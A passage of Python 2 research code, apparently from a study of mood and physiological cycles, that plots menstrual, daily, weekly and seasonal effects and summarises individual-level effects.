assert bin_idx >= 0
# So bin_idx = 0 means you're in color_scheme[0].
# This is sort of hard to check by hand so I just made maps with fake data to check it.
facecolors.append(color_scheme[bin_idx])
patches.append(Polygon(np.array(shape), True) )
#facecolors.append('red')
if country_name in countries_not_found:
countries_not_found.remove(country_name)
#else:
# facecolors.append('lightgrey')
# patches.append(Polygon(np.array(shape), True) )
print("Warning: the following countries could not be mapped because they were not found in mapping data")
print countries_not_found
ax.add_collection(PatchCollection(patches, facecolor=facecolors, edgecolor='k', linewidths=1., zorder=2))
plt.title(title_string, fontsize=16, fontweight='bold')
if plot_colorbar:
# Add legend
ax_legend = fig.add_axes([0.2, 0.15, 0.6, 0.03], zorder=3)
cb = mpl.colorbar.ColorbarBase(ax_legend, cmap=cmap_for_legend, ticks=range(num_bins + 1), boundaries=range(num_bins + 1), orientation='horizontal')
cb.ax.set_xticklabels(bin_edge_labels, fontsize=14, fontweight='bold')
fig.subplots_adjust(top=.95, left=.02, right=.98, bottom=.05)
if filename is not None:
fig.savefig(filename, dpi=300)
plt.show()
def analyze_individual_specific_interactions_between_cycles(results):
"""
Checked. Analyzes whether individuals who have larger effects in one cycle have larger effects in another cycle.
mu here is when the cycle indicator is TRUE - when the cycle indicator is FALSE.
"""
results = deepcopy(results)
all_pvals = []
for emotion_pair in results:
person_specific_interactions = results[emotion_pair]['no_substratification']['person_specific_interaction_between_cycles']
for cycle_pair in person_specific_interactions.keys():
all_pvals.append({'emotion':emotion_pair,
'cycle_pair':cycle_pair,
'p':person_specific_interactions[cycle_pair]['p'],
'r':person_specific_interactions[cycle_pair]['r'],
'abs_r':np.abs(person_specific_interactions[cycle_pair]['r']),
'n':person_specific_interactions[cycle_pair]['n'],
'mu_1':person_specific_interactions[cycle_pair]['mu_1'],
'mu_2':person_specific_interactions[cycle_pair]['mu_2']})
if person_specific_interactions[cycle_pair]['p'] < 1e-5:
plt.figure()
plt.title(cycle_pair + '\n' + emotion_pair + '\nr = %2.3f, p = %2.3e' % (person_specific_interactions[cycle_pair]['r'],
person_specific_interactions[cycle_pair]['p']))
plt.scatter(person_specific_interactions[cycle_pair]['full_effects_1'],
person_specific_interactions[cycle_pair]['full_effects_2'])
plt.xlim(-1, 1)
plt.ylim(-1, 1)
plt.show()
all_pvals = pd.DataFrame(all_pvals).sort_values(by = 'p')
return all_pvals
def analyze_non_individual_specific_interactions_between_cycles(results):
"""
Checked. Analyzes non individual-specific interactions between cycles.
"""
results = deepcopy(results)
all_pvals = []
pd.set_option('display.width', 500)
for emotion_pair in results:
regression = results[emotion_pair]['no_substratification']['interaction_between_cycles']['linear_regression']
raw_means = results[emotion_pair]['no_substratification']['interaction_between_cycles']['raw_means']
for pair_of_cycles in regression:
# loop over pairs of cycles
# get the interaction coefficient for each one
interaction_coef = [a for a in regression[pair_of_cycles]['pvalues'].index if ':' in a][0]
pval = float(regression[pair_of_cycles]['pvalues'].loc[interaction_coef])
beta = float(regression[pair_of_cycles]['betas'].loc[interaction_coef])
raw_mean_vals = raw_means[pair_of_cycles].reset_index()
assert np.all(raw_mean_vals[raw_mean_vals.columns[0]] == [False, False, True, True])
assert np.all(raw_mean_vals[raw_mean_vals.columns[1]] == [False, True, False, True])
if pval < 1e-5:
# make a plot for all statistically significant interactions
plt.figure(figsize = [10, 5])
xticks = []
vals = list(raw_mean_vals['good_mood'].values)
assert len(vals) == 4
col0 = raw_mean_vals.columns[0]
col1 = raw_mean_vals.columns[1]
assert col0 in ['summer', 'winter', 'weekend', 'middle_of_night', 'near_period']
assert col1 in ['summer', 'winter', 'weekend', 'middle_of_night', 'near_period']
for i in range(4):
xticks.append(str(col0) + ':' + str(raw_mean_vals[col0].iloc[i]) + '\n' +
str(col1) + ':' + str(raw_mean_vals[col1].iloc[i]))
x_positions = [0, 1, 3, 4]
plt.bar(x_positions, vals, width = 1) # space out bars.
plt.title('%s\n%s\n%2.3e' % (emotion_pair, pair_of_cycles, pval))
plt.xticks(x_positions, xticks)
plt.ylim([-.05, .05])
plt.show()
all_pvals.append({'emotion':emotion_pair,
'coef':interaction_coef,
'pval':pval,
'beta':beta})
all_pvals = pd.DataFrame(all_pvals)
all_pvals = all_pvals.loc[all_pvals['pval'] < 1e-5]
pd.set_option('precision', 2)
all_pvals['coef'] = all_pvals['coef'].map(lambda x:x.replace('[T.True]', ''))
all_pvals.sort_values(by = 'pval')[['emotion', 'coef', 'beta', 'pval']]
return all_pvals
def extract_most_dramatic_period_bin(data, bin_size):
"""
data should be, eg, results[opposite_pair]['no_substratification']['take_simple_means_by_group_no_individual_mean']
Looks for the bin between -7 days before period and start of period which has the most dramatic discrepancy.
"""
data = deepcopy(data)
assert sorted(data.columns) == ['err', 'mean', 'size']
data = data.loc[data.index.map(lambda x:np.abs(x) <= 14)]
assert list(data.index) == range(-14, 15)
# allow the bin to start up to two weeks before the period to the start of the period.
min_day = -14
max_day = 0
max_effect = 0
for start_day in range(min_day, max_day + 1):
idxs = data.index.map(lambda day:day >= start_day and day < start_day + bin_size)
idxs = np.array(idxs)
assert np.sum(idxs) == bin_size
effect = data.loc[idxs, 'mean'].mean() - data.loc[~idxs, 'mean'].mean()
if np.abs(effect) > np.abs(max_effect):
max_effect = effect
best_start_day = start_day
print 'maximum effect between days %i and %i (inclusive) is %2.3f, %i<=day<%i' % (min_day,
max_day,
max_effect,
best_start_day,
best_start_day + bin_size)
return best_start_day
def convert_regression_format_to_simple_mean_format(regression_data, type_of_regression, seasonal_variable='month'):
"""
Given data in the regression format -- ie, a dictionary of params and p-values --
converts to the data format make_four_cycle_plots requires.
This is convenient because otherwise we have to have make_four_cycle_plots and make_four_cycle_regression_plots
The size column is not meaningful but is included for compatibility with the other format.
Checked.
"""
assert seasonal_variable in ['month', 'week_of_year']
assert type_of_regression in ['linear_regression', 'mixed_model_regression']
if type_of_regression == 'linear_regression':
assert sorted(regression_data.keys()) == sorted(['95_CI', 'covariance_matrix', 'params', 'pvalues'])
params = regression_data['params']
lower_CI = regression_data['95_CI'][0]
upper_CI = regression_data['95_CI'][1]
assert np.allclose(upper_CI.values - params.values, params.values - lower_CI.values)
assert list(params.index) == list(upper_CI.index)
err = upper_CI - params
else:
print sorted(regression_data.keys())
assert sorted(regression_data.keys()) == ['fixed_effects_coefficients',
'fixed_effects_standard_errors', 'random_effects_covariance', 'random_effects_covariance_errors', 'ranef']
params = regression_data['fixed_effects_coefficients']
err = regression_data['fixed_effects_standard_errors'] * 1.96
cycles_to_loop_over = ['weekday', seasonal_variable, 'local_hour', 'date_relative_to_period']
no_hourly_data = np.sum(params.index.map(lambda x:'local_hour' in x)) == 0
if no_hourly_data:
cycles_to_loop_over.remove('local_hour')
new_data = {}
for cycle in cycles_to_loop_over:
beta = deepcopy(params.loc[params.index.map(lambda x:cycle in x)])
beta_err = deepcopy(err.loc[err.index.map(lambda x:cycle in x)])
if cycle == 'weekday':
missing_val = 'Friday'
weekday_processing_fxn = lambda x:x.replace('C(weekday)[T.', '').replace(']', '')
beta.index = beta.index.map(weekday_processing_fxn)
beta_err.index = beta_err.index.map(weekday_processing_fxn)
elif cycle == 'date_relative_to_period':
# this has to deal with both the mixed model and OLS formulations
# which have slightly different coefficient formats.
# the missing value is 0.
processing_fxn = lambda x:x.replace('C(date_relative_to_period, Treatment(reference=0))[T.', '').replace('C(date_relative_to_period)[T.', '').replace(']', '')
beta.index = beta.index.map(processing_fxn).astype('float')
beta_err.index = beta_err.index.map(processing_fxn).astype('float')
missing_val = 0
else:
non_weekday_processing_fxn = lambda x:x.replace('C(%s)[T.' % cycle, '').replace(']', '')
beta.index = beta.index.map(non_weekday_processing_fxn).astype('float')
beta_err.index = beta_err.index.map(non_weekday_processing_fxn).astype('float')
missing_val = min(beta.index) - 1
# insert coefficient for the missing value, which is 0.
beta = beta.append(pd.Series([0], index=[missing_val]))
assert len(set(beta.index)) == len(beta)
beta = beta.sort_index()
beta_err = beta_err.append(pd.Series([0], index=[missing_val]))
assert len(set(beta_err.index)) == len(beta_err)
beta_err = beta_err.sort_index()
assert list(beta_err.index) == list(beta.index)
new_df = pd.DataFrame({'mean':beta.values,
'size':0.0,
'err':beta_err.values})
new_df.index = beta.index
new_df = new_df[['mean', 'size', 'err']]
new_df.index.name = cycle
if cycle == 'date_relative_to_period':
new_df = new_df.loc[new_df.index.map(lambda x:np.abs(x) <= 14)]
new_data[cycle] = new_df
# if there's no hourly data in the regression (eg, because we have no hourly info) add in zero values so nothing crashes.
if no_hourly_data:
new_data['local_hour'] = pd.DataFrame({'mean':0.0,
'size':0.0,
'err':0.0},
index=range(24))
new_data['local_hour'].index.name = 'local_hour'
for cycle in new_data:
for k in new_data[cycle].columns:
assert np.isnan(new_data[cycle][k].values).sum() == 0
index_labels = list(new_data[cycle][k].index)
if cycle == 'date_relative_to_period':
assert index_labels == range(-14, 15)
elif cycle == 'local_hour':
assert index_labels == range(24)
elif cycle == 'weekday':
# sorted weekday names.
assert index_labels == ['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday', 'Wednesday']
elif cycle == 'month':
assert index_labels == range(1, 13) or index_labels == range(3, 13) # heart rate only has partial data.
elif cycle == 'week_of_year':
assert index_labels == range(52) or index_labels == range(12, 52) # heart rate only has partial data.
return new_data
def make_four_cycle_plots(results,
substratifications,
emotion_pairs,
use_20_day_menstrual_cycle=False,
data_to_use='linear_regression',
ylimits_by_pair=None,
figname=None,
show_errorbars=True,
substratification_levels_to_skip=None,
hourly_period_to_exclude=None,
colors_for_lines=None,
suptitle=True,
include_amplitudes_in_title=True,
different_colors_for_each_cycle=False,
use_expanded_seasonal_x_axis=False):
"""
loop over all substratifications (eg, [by_categorical_latitude]) and all emotion pairs.
plot all four cycles for each (just raw means, not regression adjusted estimates).
If use_20_day_menstrual_cycle = True, extends range slightly for menstrual cycle plot to make sure there
are no super-weird tail effects.
Checked.
"""
assert data_to_use in ['take_simple_means_by_group_no_individual_mean',
'take_simple_means_by_group',
'derivative_estimates_with_no_looparound',
'derivative_estimates_with_looparound',
'linear_regression']
# an annoying warning about future deprecation.
warnings.filterwarnings("ignore", message="Adding an axes using the same arguments as a previous axes currently reuses the earlier instance. In a future version, a new instance will always be created and returned. Meanwhile, this warning can be suppressed, and the future behavior ensured, by passing a unique label to each axes instance.")
if ylimits_by_pair is not None:
assert sorted(ylimits_by_pair.keys()) == sorted(emotion_pairs)
else:
ylimits_by_pair = {}
for pair in emotion_pairs:
if BBT_SUBSTRING in pair:
ylimits_by_pair[pair] = .5
elif HEART_SUBSTRING in pair:
ylimits_by_pair[pair] = 2
elif WEIGHT_SUBSTRING in pair:
ylimits_by_pair[pair] = .4
elif 'sex' in pair or 'exercise' in pair or 'sleep' in pair:
ylimits_by_pair[pair] = 15
else:
ylimits_by_pair[pair] = 10
for substratification in substratifications:
for emotion_pair in emotion_pairs:
plt.figure(figsize = [20, 6])
lines_plotted = 0
n_lines_to_plot = len(results[emotion_pair][substratification].keys())
# extract the levels we want to loop over for the substratification.
if substratification == 'no_substratification':
sorted_levels = [None]
elif all([a in [False, True] for a in results[emotion_pair][substratification].keys()]):
sorted_levels = sorted(results[emotion_pair][substratification].keys())
elif substratification in ['normalization_procedure', 'by_hemisphere', 'by_largest_timezones', 'by_country', 'all_regression_specifications', 'by_any_filtering']:
sorted_levels = sorted(results[emotion_pair][substratification].keys())
else:
# if not boolean substratifications or hemisphere, levels are are numeric; sort them in ascending order.
sorted_levels = sorted(results[emotion_pair][substratification].keys(),
key = lambda x:float(x.split()[0].replace('[', '').replace(',', '')))
if substratification_levels_to_skip is not None:
for level in substratification_levels_to_skip:
assert level in sorted_levels
n_lines_to_plot = n_lines_to_plot - 1
sorted_levels.remove(level)
for substratification_level in sorted_levels:
# first extract the data for this substratification and level
if substratification == 'no_substratification':
mean_data = deepcopy(results[emotion_pair][substratification][data_to_use])
else:
mean_data = deepcopy(results[emotion_pair][substratification][substratification_level][data_to_use])
if data_to_use == 'linear_regression':
mean_data = convert_regression_format_to_simple_mean_format(mean_data, 'linear_regression')
# now loop over all four cycles
if 'month' in mean_data:
seasonal_variable = 'month'
elif 'week_of_year' in mean_data:
seasonal_variable = 'week_of_year'
else:
raise Exception("Either month or week of year needs to be in data")
cycles_to_plot = ['date_relative_to_period', 'local_hour', 'weekday', seasonal_variable]
for cycle in cycles_to_plot:
if (cycle == 'local_hour' and
('sex*' in emotion_pair or
'sleep*' in emotion_pair or
'exercise*' in emotion_pair or
'continuous' in emotion_pair)):
# no reliable hourly information for these features.
cycles_to_plot.remove(cycle)
if cycle in ['month', 'week_of_year'] and HEART_SUBSTRING in emotion_pair:
# don't have a full year of data for this.
cycles_to_plot.remove(cycle)
for cycle_idx, cycle in enumerate(cycles_to_plot):
plt.subplot(1, 4, cycle_idx + 1)
if (cycle == 'date_relative_to_period') and \
('derivative' in data_to_use) and \
use_20_day_menstrual_cycle:
# rare and annoying special case: if we're using the derivative estimates,
# we save the 20-day period cycle in a separate df from the 14-day period one,
# since the estimates are not identical even for overlapping time periods.
means_by_cycle_point = deepcopy(mean_data['period_20'])
else:
means_by_cycle_point = deepcopy(mean_data[cycle])
if data_to_use == 'take_simple_means_by_group_no_individual_mean':
# if data is supposed to already be zero-meaned, assert that it is.
assert(np.abs(np.sum(means_by_cycle_point['mean'] * means_by_cycle_point['size'])) < 1e-5)
xtick_kwargs = {'fontsize':20, 'rotation':90} # 'fontweight':'bold'
plt.tick_params(axis='x', length=15)
if cycle == 'weekday':
# if weekday cycle, sort and truncate names.
means_by_cycle_point = means_by_cycle_point.loc[['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']]
xs = range(7)
short_weekday_names = list(means_by_cycle_point.index.map(lambda x:x[:3]))
plt.xticks(range(7), short_weekday_names, **xtick_kwargs)
elif cycle == 'date_relative_to_period':
# plot two weeks before and after, so filter data down slightly
if use_20_day_menstrual_cycle:
xs = list(means_by_cycle_point.index)
assert xs == range(-20, 21)
plt.xticks([-20, -15, -10, -5, 0, 5, 10, 15, 20], **xtick_kwargs)
else:
means_by_cycle_point = means_by_cycle_point.loc[means_by_cycle_point.index.map(lambda x:np.abs(x) <= 14)]
xs = list(means_by_cycle_point.index)
assert xs == range(-14, 15)
plt.xticks([-14, -7, 0, 7, 14], ['Day -14', 'Day -7', 'Day 0:\nperiod start', 'Day 7', 'Day 14'],
**xtick_kwargs)
elif cycle == 'local_hour':
if hourly_period_to_exclude is not None:
assert hourly_period_to_exclude[0] == 0
assert hourly_period_to_exclude[1] > hourly_period_to_exclude[0]
means_by_cycle_point = means_by_cycle_point.loc[means_by_cycle_point.index.map(lambda x:x > hourly_period_to_exclude[1])]
xs = list(means_by_cycle_point.index)
assert xs == range(hourly_period_to_exclude[1] + 1, 24)
plt.xticks(range(hourly_period_to_exclude[1] + 1, 24, 3), **xtick_kwargs)
else:
xs = list(means_by_cycle_point.index)
assert xs == range(24)
plt.xticks([0, 6, 12, 18], ['12AM', '6AM', '12PM', '6PM'], **xtick_kwargs)
elif cycle in ['month', 'week_of_year']:
# this is sort of gross. We parameterize seasonal cycles in two different ways
# and sometimes put them on the same plot.
# consequently, we can't just use the index as the xticks.
# Rather, we convert to day of year, so it's consistent.
if cycle == 'month':
xs = [int(datetime.datetime(2016, i, 15).strftime('%j')) for i in range(1, 13)]
# little bit of missing month data for 2017, since our data ends before year end.
if (substratification == 'by_start_year') and (substratification_level == '2017'):
assert list(means_by_cycle_point.index) == range(1, 12)
else:
assert list(means_by_cycle_point.index) == range(1, 13)
else:
xs = list(means_by_cycle_point.index * 7.)
assert xs == range(0, 52 * 7, 7)
plt.xticks([int(datetime.datetime(2016, a, 15).strftime('%j')) for a in [1, 4, 7, 10]],
['Jan', 'Apr', 'Jul', 'Oct'], **xtick_kwargs)
else:
raise Exception("Not a valid cycle!!")
ys = means_by_cycle_point['mean'].values
errs = means_by_cycle_point['err'].values
if np.abs(np.mean(ys)) > 1e-8:
# if data is not already zero-meaned, zero-mean it.
ys = ys - ys.mean()
if 'continuous' not in emotion_pair:
ys = ys * 100
errs = errs * 100
if different_colors_for_each_cycle:
if cycle == 'date_relative_to_period':
color_for_line = PERIOD_CYCLE_COLOR
elif cycle == 'local_hour':
color_for_line = HOUR_CYCLE_COLOR
elif cycle == 'weekday':
color_for_line = WEEKDAY_CYCLE_COLOR
else:
color_for_line = SEASONAL_CYCLE_COLOR
else:
if colors_for_lines is not None:
color_for_line = colors_for_lines[substratification_level]
else:
color_for_line = [(lines_plotted + 1.0) / n_lines_to_plot, 0, 0]
plt.errorbar(xs,
ys,
yerr = errs if show_errorbars else None,
label = substratification_level,
color = color_for_line)
if (use_expanded_seasonal_x_axis) and cycle in ['month', 'week_of_year']:
xlims = [0, 51*7]
else:
xlims = [min(xs), max(xs)]
plt.plot(xlims, [0, 0], color = 'black')
if len(sorted_levels) == 1:
maximum_delta = ys.max() - ys.min()
# if there is only one line being plotted, print out the maximum change.
if include_amplitudes_in_title:
if 'continuous' in emotion_pair:
plt.title(PRETTY_CYCLE_NAMES[cycle] + ' $\Delta$: %2.2f' % maximum_delta, fontsize = 20) # , fontweight='bold'
else:
plt.title(PRETTY_CYCLE_NAMES[cycle] + ' $\Delta$: %2.1f%%' % maximum_delta, fontsize = 20) # , fontweight='bold'
else:
plt.title(PRETTY_CYCLE_NAMES[cycle], fontsize = 20)
else:
plt.title(PRETTY_CYCLE_NAMES[cycle], fontsize=20)
plt.xlim(xlims)
ylimit = ylimits_by_pair[emotion_pair]
plt.ylim([-ylimit, ylimit])
if cycle_idx == 0:
good_symptom, bad_symptom = emotion_pair.split('_versus_')
good_symptom = good_symptom.split('*')[1].replace('_', ' ').replace('didnt', "didn't")
bad_symptom = bad_symptom.split('*')[1].replace('_', ' ').replace('didnt', "didn't")
#plt.ylabel("Change relative to baseline", fontsize = 16)
if BBT_SUBSTRING in emotion_pair:
plt.yticks([-ylimit, 0, ylimit], fontsize=20) # , fontweight='bold'
plt.ylabel("Change in BBT (deg F)", fontsize=20)
elif HEART_SUBSTRING in emotion_pair:
plt.yticks([-ylimit, 0, ylimit], fontsize=20)
plt.ylabel("Change in RHR (BPM)", fontsize=20)
elif WEIGHT_SUBSTRING in emotion_pair:
plt.yticks([-ylimit, 0, ylimit], fontsize=20)
plt.ylabel("Change in weight (LB)", fontsize=20)
else:
plt.yticks([-ylimit, 0, ylimit],
['%i%% more %s\n' % (ylimit, bad_symptom),
'Baseline',
'%i%% more %s' % (ylimit, good_symptom)],
fontsize=20)
else:
plt.yticks([])
if cycle_idx == len(cycles_to_plot) - 1:
if substratification != 'no_substratification' and (len(sorted_levels) > 1):
plt.legend(prop={'size':16}, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
lines_plotted += 1
if substratification != 'no_substratification' and (len(sorted_levels) > 1):
plt.subplots_adjust(top=.92, bottom=.35, left=.28, right=.8)
else:
plt.subplots_adjust(top=.92, bottom=.35, left=.28)
suptitle_string = 'emotion pair: %s\nsubstratification: %s\ndata source: %s, 20-day-cycle: %s' % (emotion_pair,
substratification,
data_to_use,
use_20_day_menstrual_cycle)
if suptitle:
plt.suptitle(suptitle_string, fontsize=20)
else:
print(suptitle_string)
if figname is not None:
plt.savefig(figname, dpi=300)
plt.show()
warnings.resetwarnings()
def get_hemisphere_of_timezone(tz):
"""
Checked. Returns the hemisphere of the most common timezones or raises an exception if we haven't figured out the hemisphere.
some of the Southern TZs are right on the equator
broadly the division is: South America + Australia = southern list
Europe, USA, Canada, Mexico = Northern List
exception is Caracas, which is in South America but is in the Northern hemisphere.
Some of the Brazilian TZs are quite close to the equator, as is America/Guayaquil. So in general Northern tzs are farther North
than Southern TZs are South.
"""
northern_timezones = ['Europe/Berlin',
'Europe/Lisbon',
'Europe/Paris',
'Europe/Rome',
'Europe/London',
'Europe/Copenhagen',
'America/Denver',
'Europe/Moscow',
'America/Chicago',
'Europe/Madrid',
'America/Los_Angeles',
'America/New_York',
'America/Vancouver',
'America/Toronto',
'America/Mexico_City',
'America/Caracas']
southern_timezones = ['America/Buenos_Aires',
'Australia/Melbourne',
'Australia/Sydney',
'America/Lima',
'America/Recife',
'America/Santiago',
'America/Fortaleza',
'America/Sao_Paulo',
'America/Guayaquil']
if tz in northern_timezones:
return 'Northern'
if tz in southern_timezones:
return 'Southern'
raise Exception("Not a valid timezone")
def order_subcategories(l, category_type):
"""
small helper method used by make_plots_stratified_by_category_type to put things in order. Checked.
"""
if category_type == 'by_largest_timezones':
# sort by which hemisphere and then sort alphabetically.
return sorted(l, key = lambda x:get_hemisphere_of_timezone(x) + ' ' + x)[::-1]
elif str(l[0])[0] == '[':
return sorted(l, key = lambda x:float(x.split(',')[0].replace('[', '')))
else:
return sorted(l)
def make_plots_stratified_by_category_type(results,
category_type,
emotion_pairs=None,
cycle_types_to_plot = ['near_period',
'middle_of_night',
'weekend',
'summer',
'winter'],
data_to_use='binary_analysis_no_individual_mean',
top_margin=.8,
axis_fontsize=11):
"""
Checked.
category_type is what category to substratify by.
analysis = binary_analysis_no_individual_mean
plots results broken down by category.
"""
assert data_to_use in ['binary_analysis_no_individual_mean', 'binary_analysis']
print 'USING DATA TYPE %s' % data_to_use
if emotion_pairs is None:
emotion_pairs = results.keys()
for emotion_pair in emotion_pairs:
good_symptom, bad_symptom = emotion_pair.split('_versus_')
results_by_cat = results[emotion_pair][category_type]
if category_type == 'no_substratification':
plt.figure(figsize = [5, 2])
elif category_type == 'by_largest_timezones': # need extra room because so many categories.
plt.figure(figsize = [15, 5])
else:
plt.figure(figsize = [len(cycle_types_to_plot) * 5, 2 + .5 * len(results_by_cat.keys())])
if category_type != 'no_substratification':
# create one subplot for each cycle type.
subplot_idx = 1
for cycle_type in cycle_types_to_plot:
plt.subplot(1, len(cycle_types_to_plot), subplot_idx)
# we want to plot the differences by subcategory for each cycle.
diffs = []
cat_levels = []
for level in order_subcategories(results_by_cat.keys(), category_type):
cat_levels.append(level)
if cycle_type in ['summer', 'winter'] and HEART_SUBSTRING in emotion_pair:
# no reliable data
diffs.append(0)
else:
diffs.append(results_by_cat[level][data_to_use]['%s_mean' % cycle_type] -
results_by_cat[level][data_to_use]['not_%s_mean' % cycle_type])
if subplot_idx == 1:
# make sure category levels are in same order across subplots, if not something is very weird
original_cat_levels = cat_levels
else:
assert cat_levels == original_cat_levels
assert sum(np.isnan(diffs)) == 0
assert len(diffs) == len(results_by_cat.keys())
plt.barh(range(len(diffs)),
diffs,
color = ['blue' if x < 0 else 'red' for x in diffs])
if subplot_idx == 1:
plt.yticks(range(len(diffs)),
[str(a).replace('_', ' ').replace('America/', '').replace('Europe/', '') for a in cat_levels],
fontsize=axis_fontsize)
plt.ylabel(category_type.replace('by_', '').replace('_', ' '), fontsize=axis_fontsize)
else:
plt.yticks([])
if HEART_SUBSTRING in emotion_pair:
plt.xticks([-3, 3],
['-3\nBPM', '+3\nBPM'],
fontweight = 'bold',
fontsize=axis_fontsize)
plt.xlim([-3, 3])
elif BBT_SUBSTRING in emotion_pair:
plt.xticks([-.5, .5],
['-0.5\ndeg F', '+0.5\ndeg F'],
fontweight = 'bold',
fontsize=axis_fontsize)
plt.xlim([-.2, .2])
elif WEIGHT_SUBSTRING in emotion_pair:
plt.xticks([-.5, .5],
['-.5 LBS', '+.5 LBS'],
fontweight = 'bold',
fontsize=axis_fontsize)
else:
plt.xticks([-.1, -.05, 0, .05, .1],
['10%', '5%', '0%', '5%', '10%'],
fontweight = 'bold',
fontsize=axis_fontsize)
plt.xlim([-.1, .1])
plt.title('%s effect' % cycle_type.replace('_' , ' '), fontweight='bold', fontsize=16)
pretty_bad_symptom_name = bad_symptom.split('*')[1].replace('_', ' ').replace('emotion', '').replace('6 hours or less', '<6 hrs')
pretty_good_symptom_name = good_symptom.split('*')[1].replace('_', ' ').replace('emotion', '').replace('6 hours or more', '>6 hrs')
# put bad symptom first because it's on the left in the plot.
plt.suptitle('<-%s vs. %s->' % (pretty_bad_symptom_name,
pretty_good_symptom_name),
fontweight='bold',
fontsize=16)
subplot_idx += 1
else:
# if we're not substratifying,
# we just want to make a simple plot with one bar for each type of cycle.
diffs_by_cycle_type = []
for cycle_type in cycle_types_to_plot:
diffs_by_cycle_type.append(results_by_cat[data_to_use]['%s_mean' % cycle_type] -
results_by_cat[data_to_use]['not_%s_mean' % cycle_type])
assert sum(np.isnan(diffs_by_cycle_type)) == 0
barwidth = .8
plt.barh(range(len(diffs_by_cycle_type)),
diffs_by_cycle_type,
color = ['blue' if x < 0 else 'red' for x in diffs_by_cycle_type], height = barwidth)
plt.yticks(range(len(diffs_by_cycle_type)),
[str(a).replace('_', ' ') for a in cycle_types_to_plot],
fontweight = 'bold')
plt.xlim([-.18, .18]) # we put the positive negative emotion labels as xticks,
plt.xticks([-.18, -.1, 0, .1, .18],
[bad_symptom.split('*')[1].replace('_', ' '),
'10%', '0%', '10%',
good_symptom.split('*')[1].replace('_', ' ')], fontweight = 'bold')
ylimits = [-.2 - barwidth / 2, 4 + barwidth / 2 + .2]
plt.plot([0, 0], ylimits, color = 'black')
plt.ylim(ylimits)
plt.subplots_adjust(left = .2)
plt.title(data_to_use)
plt.subplots_adjust(wspace = .15, hspace = .4, top = top_margin)
plt.show()
def make_simple_histograms_of_individual_effects(individual_effects_df, plot_titlestring, min_obs):
"""
Make histograms of individual-level effects for people who have at least min_obs observations in both binary bins.
Checked.
Main argument is individual_effects_df, which is a dataframe with individual effects.
"""
data = deepcopy(individual_effects_df)
binary_variables = ['near_period', 'middle_of_night', 'weekend', 'winter', 'summer']
plt.figure(figsize=[20, 3])
for i, binary_variable in enumerate(binary_variables):
plt.subplot(1, 5, i + 1)
# filter for people who have a minimum of n_obs with binary_variable = True and n_obs with binary_variable = False
have_enough_obs = (data['%s_n_obs' % binary_variable] >= min_obs) & (data['%s_n_obs' % binary_variable] <= data['n_obs'] - min_obs)
percent_with_enough_obs = 100 * have_enough_obs.mean()
individual_effects = 100 * data['%s_cycle_effect' % binary_variable].loc[have_enough_obs].values
mu = individual_effects.mean()
absolute_mu = np.abs(individual_effects).mean()
std = individual_effects.std()
frac_feeling_at_least_20_percent_better = 100*(individual_effects >= 20).mean()
frac_feeling_at_least_20_percent_worse = 100*(individual_effects <= -20).mean()
plt.hist(individual_effects, bins=50, range=[-100, 100])
plt.xticks([-60, -30, 0, 30, 60], ['-60%', '-30%', '0%', '30%', '60%'])
plt.xlim([-60, 60])
plt.xlabel("Change in mood")
if i == 0:
plt.ylabel("Number of people\n with this mood change")
plt.title('%s\n%2.1f%% have at least %i obs\nmu: %2.1f%%; |mu| %2.1f%%; std %2.1f%%\n\
at least 20%% better: %2.1f%%\nat least 20%% worse: %2.1f%%;\n%s' %
(plot_titlestring,
percent_with_enough_obs,
min_obs,
mu,
absolute_mu,
std,
frac_feeling_at_least_20_percent_better,
frac_feeling_at_least_20_percent_worse,
binary_variable))
plt.show()
def plot_ccdf_of_individual_effects(individual_effects_df, plot_titlestring):
"""
plot the ccdf of individual effect sizes so we can see how many people have MORE extreme cycles than a given cutoff.
individual_effects_df should be a dataframe of individual effects.
Checked.
"""
data = deepcopy(individual_effects_df)
absolute_cutoffs = range(5, 100, 5)
colors = ['red', 'black', 'blue', 'green', 'magenta']
binary_variables = ['near_period', 'middle_of_night', 'weekend', 'winter', 'summer']
# because we plot all binary effects on the same graph
# we need to make sure they're computed on the same set of people.
# so we filter for people for whom all five binary effects can be estimated.
for i, binary_variable in enumerate(binary_variables):
is_nan = np.isnan(data['%s_cycle_effect' % binary_variable])
have_zero_obs = (data['%s_n_obs' % binary_variable] == data['n_obs']) | (data['%s_n_obs' % binary_variable] == 0)
assert (is_nan == have_zero_obs).all() # make sure people with no observations are missing data.
if i == 0:
good_idxs = ~is_nan
else:
good_idxs = good_idxs & (~is_nan)
print("For %s, %2.1f%% of people have no cycle effect estimates; now have cycle estimates for %2.1f%% of people." % (
binary_variable, is_nan.mean() * 100, good_idxs.mean() * 100))
plt.figure(figsize=[12, 4])
# make two subplots: one for people who feel better, one for people who feel worse.
for feel_better in [False, True]:
plt.subplot(1, 2, 1 + feel_better)
for i, binary_variable in enumerate(binary_variables):
individual_effects = data.loc[good_idxs, '%s_cycle_effect' % binary_variable].values
individual_effects = 100.*np.array(individual_effects)
average_effect = np.mean(individual_effects)
assert sum(np.isnan(individual_effects)) == 0
percentages_whose_mood_changes_at_least_that_much = []
for abs_cutoff in absolute_cutoffs:
if feel_better:
p = 100.*np.mean(individual_effects >= abs_cutoff)
else:
p = 100.*np.mean(individual_effects <= -abs_cutoff)
percentages_whose_mood_changes_at_least_that_much.append(p)
plt.plot(absolute_cutoffs,
percentages_whose_mood_changes_at_least_that_much,
label='%s (n=%i, mean=%2.1f%%)' % (binary_variable,
len(individual_effects),
average_effect),
color=colors[i])
plt.xlim([0, 60])
plt.ylim([0, 50])
plt.xlabel("Percentage change in mood")
if feel_better:
plt.title('%s\nFeel BETTER during this period' % plot_titlestring)
else:
plt.title('%s\nFeel WORSE during this period' % plot_titlestring)
plt.ylabel("Percentage of population\nwhose mood changes this dramatically")
plt.legend()
plt.show()
def plot_means_by_date(results,
emotion_pairs,
data_to_use,
min_date,
max_date,
min_obs=500,
substratification='no_substratification',
substratification_level=None,
ylimit=10,
outliers_to_highlight=None,
plot_the_weekend=False,
period_effects_vector=None,
figname=None,
print_outlier_dates=True):
"""
Plots the means over time. Plot is zero-centered. Checked.
Currently only set up to do a single substratification level.
"""
assert type(ylimit) is int
assert data_to_use in ['means_by_date', 'means_by_date_no_individual_mean']
for emotion_pair in emotion_pairs:
if substratification == 'no_substratification':
assert substratification_level is None
data = deepcopy(results[emotion_pair][substratification][data_to_use])
else:
assert substratification_level is not None
